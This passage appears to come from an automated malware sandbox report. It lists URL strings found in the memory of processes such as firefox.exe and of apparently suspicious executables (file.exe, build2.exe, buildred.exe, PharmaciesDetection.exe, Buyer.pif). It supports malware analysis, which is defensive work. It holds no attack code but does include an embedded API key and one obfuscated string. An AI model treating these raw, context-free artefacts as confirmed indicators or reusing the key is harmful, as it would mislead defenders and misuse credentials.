Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 00000028.00000002.2913407729.0000026192ECC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%The
Source: firefox.exe, 00000028.00000002.2913407729.0000026192E9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902841572.0000026192521000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDA72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestinitializeShowSearchSuggestionsFirstPref/matchGrou
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://monitor.firefox.com_migrateXULStoreForDocumentbookmarksToolbarWasVisibledevice-connected-not
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.comFIXUP_FLAG_PRIVATE_CONTEXTFIXUP_FLAG_FORCE_ALTERNATE_URIexternalProtocol
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comPage
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelObserver
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CE8000.00000004.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3085149887.000001F172CEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2179300138.000000002EF35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.comcreateContentPrincipalFromOriginremoveTabsProgressListenerchrome://bro
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
